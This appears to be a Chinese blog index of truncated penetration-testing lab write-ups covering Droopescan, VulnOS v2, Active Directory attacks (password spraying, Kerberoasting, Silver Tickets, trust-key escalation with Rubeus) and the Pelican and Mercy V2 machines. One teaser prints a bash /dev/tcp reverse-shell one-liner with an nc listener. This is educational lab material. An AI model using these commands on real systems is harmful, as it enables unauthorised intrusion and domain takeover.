Droopescan
Droopescan是一款基于插件的扫描器,可帮助安全研究人员发现Drupal,SilverStripe,Wordpress,Joomla(枚举版本信息和可利用URL地址)和Moodle的问题。安装:使用pip安装会非常容易:apt-get i...
VulnOS v2靶机的两种方法渗透测试详解
实验环境攻击者 Kali 192.168.0.103受害者 VulnOS v2 IP未知攻击者和受害者在同一网段 1. 信息收集nmap -sn 192.168.0.0/24受害者IP为192.168.0.101 收集受害者服务详情nmap -sV -A 192.168.0...
对 Active Directory 身份验证执行攻击1 密码喷射
1. 密码攻击在探索这些攻击之前,我们需要考虑一个重要的因素。在执行暴力或单词列表身份验证攻击时,我们必须注意帐户锁定。登录失败次数过多可能会阻止帐户遭受进一步的攻击,并可能向系统管...
对 Active Directory 身份验证执行攻击4 Silver Tickets
在对 Active Directory 身份验证执行攻击3中,我们获取并破解了 TGS-REP 哈希以检索 SPN 的明文密码。我们将更进一步,伪造我们自己的服务票证。 Kerberos 身份验证的内部工作原理,在服务帐户...
Objective 14
任务使用kerberoast攻击 破解密码找到SQL Server 服务账户 找出以用户帐户运行的服务以及以机器帐户运行的服务. C:\AD\Tools\PowerView.ps1Get-DomainUser -SPN 使用Rubeus得到svcadmin accou...
Pelican
简介point 20PelicanDifficulty INTERMEDIATErated by community INTERMEDIAT Let's hope to see one at the zoo. 实验环境攻击者 Kali 192.168.45.209受害者 IP 192.168.181.98 Linux 1. ...
Magic Magic Bytes Head文件上传绕过 mysqldump
简介MetaDifficulty Medium 实验环境攻击者 Kali 10.10.16.9受害者 IP 10.10.10.185 Linux 1. 信息收集收集受害者服务详情nmap -sV -A 10.10.10.14522 80 开启 gobuster爆破gobuster dir -...
Objective 18
任务• 使用 DA 访问 dollarcorp.moneycorp.local,使用域信任密钥将权限升级到企业管理员或 DA 到父域 moneycorp.local。 使用DA权限启动一个进程C:\AD\Tools\Rubeus.exe asktgt /user:svcadm...
交互式shell和稳定shell的建立
1. python方式建立交互式shell攻击者先监听nc -lvnp 监听端口 受害者bash -c 'bash -i >& /dev/tcp/攻击者ip/攻击者端口 0>&1'再攻击者端就能得到shell 如果有python 可以使用...
Mercy V2 knock过滤端口解决 Tomcat用户名密码文件
实验环境攻击者 Kali 192.168.192.128受害者 IP 192.168.192.175 Linux 1. 信息收集80端口被过滤掉了看起来是tomcat base64解码大致意思是有个人的密码是password 访问smb服务这个看起来既是...